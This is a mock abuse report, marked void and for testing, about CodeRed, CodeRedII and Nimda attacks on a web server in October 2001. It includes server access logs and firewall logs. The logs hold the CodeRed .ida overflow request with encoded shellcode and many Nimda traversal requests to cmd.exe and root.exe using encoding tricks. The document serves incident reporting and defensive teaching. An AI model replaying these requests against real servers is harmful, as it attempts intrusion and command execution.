================================================================ This example incident report is void - for testing purposes only ================================================================ Subject: CodeRedII and Nimda Attack from Originating_Country [incidentID#666] Date: Fri, 05 Oct 2001 06:06:06 +0200 From: Bastard Operator From Hell Organization: Operators Unlimited To: Abuse , cert , Foreign Hostmaster , Everybody And Their Dog -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 L.S. Since Thursday October 4 we have exerienced CodeRed, CodeRedII and Nimda-attacks from the network 10.11.12.0/24. Following these attacks there has been numerous attempts to access vulnerabilities created by CodeRed, CodeRedII and Nimda. Some of these attacks have been sucessfull and we require your assistance in tracking down the responsible parties. All attacks from you network has been aimed toward our public WWW-server located at IP 172.22.10.12. Systems performing the attack on your network are: 10.11.12.13, 10.11.12.29 and 10.11.12.194. Our system (172.22.10.12) has been infected with CodeRed, CodeRedII and Nimda. We have limited network access to the system by installing a firewall. A sample of the logfiles from the firewall are included below. The following relevant data has been collected from our WWW-server: 10.11.12.194 - - [04/Oct/2001:22:15:54 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 420 10.11.12.13 - - [04/Oct/2001:22:24:48 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 373 10.11.12.29 - - [04/Oct/2001:22:35:49 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 373 10.11.12.194 - - [04/Oct/2001:23:43:30 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 270 10.11.12.194 - - [04/Oct/2001:23:43:32 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 268 10.11.12.194 - - [04/Oct/2001:23:43:33 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 278 10.11.12.194 - - [04/Oct/2001:23:43:44 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 278 10.11.12.194 - - [04/Oct/2001:23:44:06 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 292 10.11.12.194 - - [04/Oct/2001:23:44:11 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 309 10.11.12.194 - - [04/Oct/2001:23:44:13 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 309 10.11.12.194 - - [04/Oct/2001:23:44:14 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 325 10.11.12.194 - - [04/Oct/2001:23:44:18 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 291 10.11.12.194 - - [04/Oct/2001:23:44:20 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 309 10.11.12.194 - - [04/Oct/2001:23:44:22 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 291 10.11.12.194 - - [04/Oct/2001:23:44:23 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 291 10.11.12.194 - - [04/Oct/2001:23:44:25 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 283 10.11.12.194 - - [04/Oct/2001:23:44:27 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 293 10.11.12.194 - - [04/Oct/2001:23:44:28 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 292 10.11.12.194 - - [04/Oct/2001:23:44:30 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 292 10.11.12.13 - - [04/Oct/2001:22:41:27 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 270 10.11.12.13 - - [04/Oct/2001:22:41:28 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 268 10.11.12.13 - - [04/Oct/2001:22:41:28 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 278 10.11.12.13 - - [04/Oct/2001:22:41:29 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 278 10.11.12.13 - - [04/Oct/2001:22:41:29 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 292 10.11.12.13 - - [04/Oct/2001:22:41:30 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 309 10.11.12.13 - - [04/Oct/2001:22:41:30 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 309 10.11.12.13 - - [04/Oct/2001:22:41:31 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 325 10.11.12.13 - - [04/Oct/2001:22:41:31 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 291 10.11.12.13 - - [04/Oct/2001:22:41:32 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 291 10.11.12.13 - - [04/Oct/2001:22:41:32 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 291 10.11.12.13 - - [04/Oct/2001:22:41:33 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 291 10.11.12.13 - - [04/Oct/2001:22:41:33 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 293 10.11.12.13 - - [04/Oct/2001:22:41:34 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 293 10.11.12.13 - - [04/Oct/2001:22:41:34 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 292 10.11.12.13 - - [04/Oct/2001:22:41:35 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 292 Firewall logs the following: Oct 05 01:02:10 firewall kernel: Deny In=eth2 OUT= Mac=00:01:02:03:04:05 SRC=10.11.12.194 DST=172.22.10.12 LEN=48 TOS=0x00 PREC=0x00 TTL=128 ID=5868 DF PROTO=TCP SPT=12567 DPT=21 WINDOW=44032 SYN URGP=0 Oct 05 01:02:11 firewall kernel: Deny In=eth2 OUT= Mac=00:01:02:03:04:05 SRC=10.11.12.194 DST=172.22.10.12 LEN=48 TOS=0x00 PREC=0x00 TTL=128 ID=5871 DF PROTO=TCP SPT=12567 DPT=22 WINDOW=44032 SYN URGP=0 Oct 05 01:02:12 firewall kernel: Deny In=eth2 OUT= Mac=00:01:02:03:04:05 SRC=10.11.12.194 DST=172.22.10.12 LEN=48 TOS=0x00 PREC=0x00 TTL=128 ID=5899 DF PROTO=TCP SPT=12567 DPT=23 WINDOW=44032 SYN URGP=0 Oct 05 01:02:13 firewall kernel: Deny In=eth2 OUT= Mac=00:01:02:03:04:05 SRC=10.11.12.194 DST=172.22.10.12 LEN=48 TOS=0x00 PREC=0x00 TTL=128 ID=5910 DF PROTO=TCP SPT=12567 DPT=110 WINDOW=44032 SYN URGP=0 Regards, Kalle Anka BOFH-CERT +991-2-345-6789 -----BEGIN PGP SIGNATURE----- Version: PGP 7.0 iQA/AwUBOqkEjpoxvmlLq0UAUIDkleookdlliwoslc,iekdTF4AnAym EKiaPFGn79n6XNPds2L007uL =fAnW -----END PGP SIGNATURE-----